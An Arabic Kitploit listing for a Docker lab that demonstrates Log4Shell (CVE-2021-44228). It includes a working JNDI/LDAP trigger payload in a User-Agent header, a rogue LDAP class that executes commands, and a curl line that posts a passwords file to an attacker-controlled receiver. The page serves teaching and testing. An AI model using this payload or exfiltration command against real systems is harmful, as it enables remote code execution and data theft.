Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-docker-example | Kitploit
أدوات/GitHubGitHub/dicanio/cve-2021-44228-docker-example
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتالتعلم والتعليممختبرات وتدريب عملي
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44228-docker-example

مثال بسيط عن CVE-2021-44228 لنقل البيانات من خادم ضعيف إلى خدمة ويب يتحكم فيها المهاجم. جميع المكوّنات المعنية تعمل عبر Docker.

المكوّنات

vulnerable-server

هذا خادم Java قياسي يعمل كضحية. يعمل بالنسخ التالية:

  • Java 8u111
  • تطبيق ويب (Spring Boot 2.6.1)
  • Log4J

هذا الخادم قابل للاستغلال باستخدام هذا الإعداد.

معلومات إضافية:

  • نقطة النهاية عند /logging (GET) ستسجّل وكيل المستخدم باستخدام Log4J
  • /foo/passwords.txt موجود (هدف المهاجم)

محتويات passwords.txt:

root@kitploit:~
my secret

malicious-receiver

هذا خادم Java قياسي يعمل كجامع بيانات للمهاجم. يعمل بالنسخ التالية:

  • Java 17
  • تطبيق ويب (Spring Boot 2.6.1)

معلومات إضافية:

  • نقطة النهاية عند receiver (POST) ستسجّل نص الطلب

malicious-ldap

هذا خادم LDAP مدعوم من rogue-jndi. تم تعديل صفّه ExportJava بحيث يتم تنفيذ الأوامر المُمرَّرة عبر الخيار -c.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

عندما يطلبه الخادم الضعيف، سيستجيب بصف ينفّذ الأمر التالي عند إنشائه:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

وهذا سيرسل فعليًا محتوى /foo/passwords.txt إلى نقطة النهاية المُجهَّزة لدى جهاز الاستقبال الخبيث.

الاستخدام

  1. تجهيز صور Docker بالتشغيل:
    root@kitploit:~
    ./build.sh
    
  2. تشغيل حاويات المكوّنات بالتنفيذ:
    root@kitploit:~
    ./start.sh
    
  3. تفعيل الثغرة بالتشغيل:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. فحص مخرجات السجل لمكوّن الاستقبال الخبيث بالتشغيل:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    يجب أن يظهر فيها محتوى ملف passwords.txt الخاص بالخادم.
  5. إيقاف حاويات المكوّنات بالتشغيل:
    root@kitploit:~
    ./stop.sh
    
تنزيل الأداة